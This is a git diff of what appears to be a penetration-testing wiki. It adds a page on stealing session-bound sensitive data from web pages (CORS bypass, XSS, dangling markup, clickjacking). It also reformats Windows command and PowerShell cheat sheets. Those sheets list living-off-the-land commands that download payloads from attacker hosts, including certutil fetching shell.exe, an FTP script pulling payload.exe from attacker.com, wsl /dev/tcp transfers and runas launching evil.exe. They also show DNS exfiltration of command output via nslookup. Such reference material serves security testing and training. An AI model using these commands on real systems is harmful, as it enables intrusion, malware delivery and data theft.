diff --git a/SUMMARY.md b/SUMMARY.md index 788ef5c14..38e3bf27a 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -417,4 +417,5 @@ * [Online Platforms with API](online-platforms-with-api.md) * [Phising Documents](phising-documents.md) * [Reset Password Bypass](reset-password.md) +* [Stealing Sensitive Information Disclosure from a Web](stealing-sensitive-information-disclosure-from-a-web.md) diff --git a/pentesting/pentesting-smb.md b/pentesting/pentesting-smb.md index 89b65ad6f..cfa2a9118 100644 --- a/pentesting/pentesting-smb.md +++ b/pentesting/pentesting-smb.md @@ -264,7 +264,9 @@ smbclient /// > mget * #Download everything to current directory ``` + Commands: + * mask: specifies the mask which is used to filter the files within the directory \(e.g. "" for all files\) * resurse: toggles recursion on \(default: off\) * prompt: toggles prompting for filesnames off \(default: on\) diff --git a/stealing-sensitive-information-disclosure-from-a-web.md b/stealing-sensitive-information-disclosure-from-a-web.md new file mode 100644 index 000000000..b596eb99f --- /dev/null +++ b/stealing-sensitive-information-disclosure-from-a-web.md @@ -0,0 +1,10 @@ +# Stealing Sensitive Information Disclosure from a Web + +If at some point you find a **web page that presents you sensitive information based on your session**: Maybe it's reflecting cookies, or printing or CC details or any other sensitive information, you may try to steal it. +Here I present you the main ways to can try to achieve it: + +* [**CORS bypass**](pentesting-web/cors-bypass.md): If you can bypass CORS headers you will be able to steal the information performing Ajax request for a malicious page. +* \*\*\*\*[**XSS**](pentesting-web/xss-cross-site-scripting/): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information. +* \*\*\*\*[**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection.md): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags. +* [**Clickjaking**](pentesting-web/clickjacking.md): If there is no protection against this attack, you may be able to trick the user into sending you the sensitive data \(an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)\). + diff --git a/windows/basic-cmd-for-pentesters.md b/windows/basic-cmd-for-pentesters.md index 4a2c2dc56..c03dc0928 100644 --- a/windows/basic-cmd-for-pentesters.md +++ b/windows/basic-cmd-for-pentesters.md @@ -252,111 +252,133 @@ arp -A ## Download Bitsadmin.exe + ```text bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 ``` CertReq.exe + ```text CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt ``` Certutil.exe + ```text certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe ``` Desktopimgdownldr.exe + ```text set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr ``` Diantz.exe + ```text diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab ``` Esentutl.exe + ```text esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o ``` Expand.exe + ```text expand \\webdav\folder\file.bat c:\ADS\file.bat ``` Extrac32.exe + ```text extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt ``` Findstr.exe + ```text findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe ``` Ftp.exe + ```text cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" ``` GfxDownloadWrapper.exe + ```text C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE" ``` Hh.exe + ```text HH.exe http://some.url/script.ps1 ``` Ieexec.exe + ```text ieexec.exe http://x.x.x.x:8080/bypass.exe ``` Makecab.exe + ```text makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab ``` MpCmdRun.exe + ```text MpCmdRun.exe -DownloadFile -url -path //Windows Defender executable ``` Replace.exe + ```text replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A ``` Excel.exe + ```text Excel.exe http://192.168.1.10/TeamsAddinLoader.dll ``` Powerpnt.exe + ```text Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll" ``` Squirrel.exe + ```text squirrel.exe --download [url to package] ``` Update.exe + ```text Update.exe --download [url to package] ``` Winword.exe + ```text winword.exe "http://192.168.1.10/TeamsAddinLoader.dll" ``` Wsl.exe + ```text wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' ``` @@ -373,7 +395,7 @@ time #Get current time date #Get current date shutdown /r /t 0 #Shutdown now type #Cat file - + #Runas runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials runas /netonly /user\ "cmd.exe" ::The password will be prompted @@ -411,12 +433,12 @@ netsh http show urlacl ```bash sudo responder -I #Active -sudo tcpdump -i -A proto udp and dst port 53 and dst ip #Passive +sudo tcpdump -i -A proto udp and dst port 53 and dst ip #Passive ``` #### Victim -_**for /f tokens**_ ****technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server +_**for /f tokens**_ _\*\*_technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server ```text for /f %a in ('whoami') do nslookup %a #Get whoami diff --git a/windows/basic-powershell-for-pentesters/README.md b/windows/basic-powershell-for-pentesters/README.md index 6ad0c1011..68d120f27 100644 --- a/windows/basic-powershell-for-pentesters/README.md +++ b/windows/basic-powershell-for-pentesters/README.md @@ -40,21 +40,25 @@ powershell -nop -enc ## Download ### System.Net.WebClient + ```text (New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe") ``` ### Invoke-WebRequest + ```text Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe" ``` ### Wget + ```text wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe" ``` ### BitsTransfer + ```text Import-Module BitsTransfer Start-BitsTransfer -Source $url -Destination $output